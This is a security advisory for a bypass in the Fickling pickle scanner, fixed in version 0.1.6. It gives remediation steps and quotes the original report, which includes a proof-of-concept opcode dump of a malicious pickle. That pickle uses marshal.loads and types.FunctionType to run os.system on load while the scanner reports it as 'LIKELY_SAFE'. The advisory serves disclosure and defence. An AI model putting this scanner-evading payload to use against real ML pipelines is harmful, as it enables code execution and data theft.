If your ML pipeline uses Fickling to gate pickle file ingestion, your security control was bypassable until v0.1.6 — a crafted pickle using marshal.loads or types.FunctionType would scan as 'LIKELY_SAFE' while executing arbitrary code on deserialization. Patch to Fickling ≥0.1.6 immediately and treat any pickle files vetted by an older version as untrusted until re-scanned.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| fickling | pip | < 0.1.6 | 0.1.6 |
Do you use fickling? You're affected.
Severity & Risk
Recommended Action
- 1) Upgrade fickling to ≥0.1.6 immediately (pip install --upgrade fickling). 2) Re-scan or re-acquire any pickle files that passed Fickling validation while running a version <0.1.6 — consider them untrusted until verified. 3) Apply defense-in-depth: isolate deserialization in a sandboxed process or network-restricted container regardless of Fickling results. 4) Prefer safer serialization formats (safetensors, ONNX, TorchScript) for model distribution and restrict pickle to internally-generated, hash-verified artifacts only. 5) Instrument pickle loading to alert on unexpected subprocess spawns or outbound connections. 6) Add Fickling version pinning with automated update checks to your ML dependency governance process.
Classification
Compliance Impact
This CVE is relevant to:
Technical Details
NVD Description
## Fickling Assessment Based on the test case provided in the original report below, this bypass was caused by `marshal` and `types` missing from the block list of unsafe module imports, Fickling started blocking both modules to address this issue. This was fixed in https://github.com/trailofbits/fickling/pull/186. The crash is unrelated and has no security impact—it will be addressed separately. ## Original report ### Summary There's missing detection for the python modules, `marshal.loads` and `types.FunctionType` and Fickling throws unhandled ValueErrors when the stack is deliberately exhausted. ### Details Fickling simply doesn't have the aforementioned modules in its list of unsafe imports and therefore it fails to get detected. ### PoC The following is a disassembled view of a malicious pickle file that uses these modules: ``` 0: \x80 PROTO 4 2: \x95 FRAME 0 11: \x8c SHORT_BINUNICODE 'marshal' 20: \x8c SHORT_BINUNICODE 'loads' 27: \x93 STACK_GLOBAL 28: \x94 MEMOIZE (as 0) 29: h BINGET 0 31: C SHORT_BINBYTES b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\xf30\x00\x00\x00\x95\x00S\x00S\x01K\x00r\x00\\\x00R\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"\x00S\x025\x01\x00\x00\x00\x00\x00\x00 \x00g\x01)\x03\xe9\x00\x00\x00\x00N\xda\x02id)\x02\xda\x02os\xda\x06system\xa9\x00\xf3\x00\x00\x00\x00\xda\x08<string>\xda\x08<module>r\t\x00\x00\x00\x01\x00\x00\x00s\x13\x00\x00\x00\xf0\x03\x01\x01\x01\xe3\x00\t\xd8\x00\x02\x87\t\x82\t\x88$\x85\x0fr\x07\x00\x00\x00' 198: \x85 TUPLE1 199: R REDUCE 200: \x94 MEMOIZE (as 1) 201: \x8c SHORT_BINUNICODE 'types' 208: \x8c SHORT_BINUNICODE 'FunctionType' 222: \x93 STACK_GLOBAL 223: \x94 MEMOIZE (as 2) 224: h BINGET 2 226: h BINGET 1 228: } EMPTY_DICT 229: \x86 TUPLE2 230: R REDUCE 231: \x94 MEMOIZE (as 3) 232: h BINGET 3 234: ) EMPTY_TUPLE 235: R REDUCE 236: \x94 MEMOIZE (as 4) 237: \x8c SHORT_BINUNICODE 'gottem' 245: b BUILD 246: . STOP ``` When analyzing this modified file, safety_result.json shows: ``` { "severity": "LIKELY_SAFE", "analysis": "Warning: Fickling failed to detect any overtly unsafe code,but the pickle file may still be unsafe.Do not unpickle this file if it is from an untrusted source!\n\n", "detailed_results": {} } ``` Furthermore, when we run `fickling -s <path_to_malicious_file>`, we also encounter this error: ``` Traceback (most recent call last): File "<path>/fickling", line 7, in <module> sys.exit(main()) ^^^^^^ File "<path>/fickling/cli.py", line 163, in main safety_results = check_safety(pickled, json_output_path=json_output_path) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "<path>/fickling/analysis.py", line 408, in check_safety results = analyzer.analyze(pickled) ^^^^^^^^^^^^^^^^^^^^^^^^^ File "<path>/fickling/analysis.py", line 65, in analyze context.analyze(a) File "<path>/fickling/analysis.py", line 31, in analyze results = list(analysis.analyze(self)) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "<path>/fickling/analysis.py", line 196, in analyze for node in context.pickled.non_standard_imports(): ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "<path>/fickling/fickle.py", line 826, in non_standard_imports for node in self.properties.imports: ^^^^^^^^^^^^^^^ File "<path>/fickling/fickle.py", line 777, in properties self._properties.visit(self.ast) ^^^^^^^^ File "<path>/fickling/fickle.py", line 833, in ast self._ast = Interpreter.interpret(self) ^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "<path>/fickling/fickle.py", line 1001, in interpret return Interpreter(pickled).to_ast() ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "<path>/fickling/fickle.py", line 927, in to_ast self.run() File "<path>/fickling/fickle.py", line 971, in run self.step() File "<path>/fickling/fickle.py", line 989, in step opcode.run(self) File "<path>/fickling/fickle.py", line 1767, in run raise ValueError("Exhausted the stack while searching for a MarkObject!") ValueError: Exhausted the stack while searching for a MarkObject! ``` ### Impact This allows an attacker to craft a malicious pickle file that can bypass fickling since it misses detections for `types.FunctionType` and `marshal.loads`. A user who deserializes such a file, believing it to be safe, would inadvertently execute arbitrary code on their system. This impacts any user or system that uses Fickling to vet pickle files for security issues.
Exploitation Scenario
An attacker targeting an organization's model registry crafts a malicious pickle file embedding a reverse shell via marshal.loads — compiling Python bytecode that calls os.system() to beacon out. The file is submitted to a shared model hub or CI model validation step. Fickling scans it and returns 'LIKELY_SAFE' because marshal and types were absent from its blocklist. The automated pipeline trusts the verdict and loads the model into the inference service. On deserialization, the embedded bytecode executes with the service account's privileges, establishing a foothold inside the ML infrastructure. From there, the attacker exfiltrates proprietary model weights, training data, or cloud credentials stored in environment variables.
Weaknesses (CWE)
References
- github.com/advisories/GHSA-565g-hwwr-4pp3
- github.com/trailofbits/fickling/commit/4e34561301bda1450268d1d7b0b2b151de33b913
- github.com/trailofbits/fickling/pull/186
- github.com/trailofbits/fickling/releases/tag/v0.1.6
- github.com/trailofbits/fickling/security/advisories/GHSA-565g-hwwr-4pp3
- nvd.nist.gov/vuln/detail/CVE-2025-67747